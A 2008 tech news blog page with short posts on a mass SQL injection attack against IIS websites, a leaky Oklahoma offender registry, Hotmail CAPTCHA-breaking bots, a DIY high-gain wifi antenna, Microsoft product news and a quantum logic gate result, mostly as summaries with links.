Your security, networking, programming, and application news source.

Monday, April 28, 2008

Automated SQL Injection Mass Attack Hits IIS Websites

“Exploits of a Mom” by <xkcd>

  An automated attack against Microsoft’s IIS servers has hit some 500,000 websites. Websites affected include the United Nations, UK Government sites and the U.S. Department of Homeland Security.

  These attacks targeted Microsoft IIS servers which allow generic SQL commands that don’t require specific table-level arguments. The attack targets IIS servers which run ASP allowing them to pollute database servers in a generic way that doesn't require prior knowledge of the database's table and field structure.

  The attacking script injects malicious JavaScript code into every text field of the database. The JavaScript then loads an external script that can compromise a user’s PC. So far there have been no details about who is behind the attacks.

<Wired Blog - Massive Attack: Half A Million Microsoft-Powered Sites Hit With SQL Injection> (4/28/2008)
<Hackademix - Mass Attack FAQ> (4/26/2008)

Saturday, April 26, 2008

When Logo Design Goes Wrong

  The Office of Government Commerce, an office of the treasury in the United Kingdom, is commonly known as OGC. An investment of £14,000 was put into a logo design, which resulted in a nice formal image of the OGC acronym.

According to insiders, within seconds of unveiling employees spotted the problem with this proud logo. This despite it already being etched in mouse pads and pens. If you turn it on it's side, you should notice the problem.

<A hallarious animated version (gif) was posted here>

<The UK Telegraph - OGC unveils new logo to red faces> (4/25/2008)

Saturday, April 19, 2008

Microsoft Works SE (Sponsored Edition) Marketing Trials

  Microsoft is silently trying it's hand at ad-funded software with Microsoft Works SE (Sponsored Edition). The trials are being kept secretive, but United States, France, Canada, Poland and the United Kingdom are said to be involved. It is available only through select computer makers and Microsoft won't say which computer makers those are. Some searching has showed <Sony offering it in the U.S.> and <Packard Bell offering it to the U.K.>, both bundled with notebooks.

Microsoft Vice President Chris Capossela, on this and the some subscription based announcements: "These are all experiments."

Read more at:
<CNET News - Microsoft quietly offering ad-funded Works> April 18, 2008

Friday, April 18, 2008

Microsoft Vista Users: Bend Over

  Didn't listen to all those Vista bashers? Chances are your already kicking yourself over issues your having with Vista. Since you're all waiting for some reassuring words from Microsoft, you've got it.
  Last Thursday, at an annual Seattle event Steve Ballmer, Microsoft CEO, called the Vista OS "a work in progress"! I hope they warned you about this when you dropped $200-300 or more on a copy.

You could petition:
<Info World's Save XP Petition>

You could jump on the Linux bandwagon:

Or you could keep your hopes up waiting for the next Windows:
<Windows 7 (Wikipedia)>

Anyone think a Mac is an option? (comments are wide open, as always)

Thursday, April 17, 2008

The WIFI Predator [DIYS]

  Do it yourself high-powered antenna with custom firmware to activly search out open wireless connections.

Assembly Instructions:

<The Wifi Predator> - 4 Step Assembly Instructions at (April 14 2008)

Hardware List:

  • Buffalo WHR-HP-G54

  • HyperLink 2.4GHz 14.5 Yagi Antenna

  • Reverse Polarity SMA Male to Male N-type adapter.

  • Sears’s Ultra-Cheap camera tripod

Sofware/Firmware List:

  • <DD-WRT firmware>modification of the original Linksys Firmware

  • <AutoAP add on> to DD-WRT that allows routers to continuously scan for and connect to open wireless networks.

Quantum Computing Creation

<Prem Kumar>, a professor of electrical engineering and computer science at Northwestern University, and his team have shown that they can create a quantum logic NOT gate within an optical fiber. Quantum logic with laser beams, that passed through the air have been built before. Because the gate is within fiber, it could be part of a circuit that relays information securely, over hundreds of kilometers of fiber. This gate is one of the building blocks needed to build a <quantum computer>.

<Technology Review - Toward Quantum Internet> Published by MIT (Tuesday, April 15, 2008).

Tuesday, April 15, 2008

Hotmail CAPTCHA Massacre

<Recent reports> of streamlined Windows Live CAPTCHA bot attacks are slamming Hotmail. <New reports> show this process in action with success rates purported one in 8 to 10 attempts being successful (10 - 15%). One bot can <reportedly> create at least 1,440 accounts a day. These accounts are then used for mass mail spamming.

SQL Exploit by Recent Example

  Oklahoma sets up a <sex offender violent offender site>. Right off the bat you can see the site is still managed by numskulls. On their front page 'Notice to public:' has a broken non-breaking-space HTML tag hanging out.
  Apparently until several people stressed the problem and severity, the site sent and accepted SQL queries with no sanitation through web requests. This allowed anyone with minimal SQL knowledge to retrieve social security numbers and other personal information of tens of thousands of people on this registry.

<The Daily WTF>
(contains some examples as well as details)

Find sites with similarly poor design with a crafted Google search:
<Google Search Example>

Tuesday, April 8, 2008

XSS Cross- Site Scripting Explained

I've read about cross-site scripting techniques for years, but when I ran across an IBM article about XSS posted on <tweako>, it stuck out as a great explanation.

<IBM Rational AppScan: Cross-site scripting explained>